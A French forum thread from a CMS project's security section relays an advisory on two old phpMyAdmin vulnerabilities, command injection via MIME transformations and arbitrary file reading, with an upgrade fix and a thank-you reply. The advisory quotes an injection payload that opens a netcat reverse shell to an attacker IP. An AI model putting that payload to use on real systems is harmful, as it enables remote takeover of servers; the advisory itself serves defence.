NPDS : Gestion de contenu et de communauté
Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
31 visiteur(s) et 0 membre(s) en ligne.
Autres infos
Activité du Site
Pages vues depuis 25/05/2001 : 108 402 043
- Nb. de membres 8 693
- Nb. d'articles 1 695
- Nb. de forums 26
- Nb. de sujets 8
- Nb. de critiques 92
Index du forum »» Sécurité »» [Résolu] - Alerte PHPMYADMIN
[Résolu] - Alerte PHPMYADMIN#14730
2Contributeur(s)
3 Modérateur(s)
Anonyme
* Description Technique *
Deux vulnérabilités ont été identifiées dans phpMyAdmin, elles pourraient être exploitées par un attaquant distant afin de compromettre un système vulnérable. Le premier problème se situe au niveau des transformations externes MIME, ce qui pourrait permettre l'injection de commandes arbitraires (ex : F';nc -e /bin/sh $IP 80;echo 'A). La seconde vulnérabilité se situe au niveau du mécanisme UploadDir et read_dump.php qui ne filtrent pas correctement la variable "sql_localfile", ce qui pourrait permettre l'accès à des fichiers arbitraires.
Note : L'exploitation de ces vulnérabilités n'est possible que si "PHP safe mode" est à "off".
* Versions Vulnérables *
phpMyAdmin versions inférieures à 2.6.1-rc1
* Solution *
phpMyAdmin version 2.6.1-rc1 :
http://www.phpmyadmin.net/home_page/downloads.php
Source : K-otik
Deux vulnérabilités ont été identifiées dans phpMyAdmin, elles pourraient être exploitées par un attaquant distant afin de compromettre un système vulnérable. Le premier problème se situe au niveau des transformations externes MIME, ce qui pourrait permettre l'injection de commandes arbitraires (ex : F';nc -e /bin/sh $IP 80;echo 'A). La seconde vulnérabilité se situe au niveau du mécanisme UploadDir et read_dump.php qui ne filtrent pas correctement la variable "sql_localfile", ce qui pourrait permettre l'accès à des fichiers arbitraires.
Note : L'exploitation de ces vulnérabilités n'est possible que si "PHP safe mode" est à "off".
* Versions Vulnérables *
phpMyAdmin versions inférieures à 2.6.1-rc1
* Solution *
phpMyAdmin version 2.6.1-rc1 :
http://www.phpmyadmin.net/home_page/downloads.php
Source : K-otik
Boris
Très bon à savoir! :=! Merci l'anonyme!!!
Conception de logiciels, sites web & communication, hébergement web professionnel, solutions de sécurité, dépannage/maintenance et fourniture de matériel, etc.
E-Concept Applications
E-Concept Applications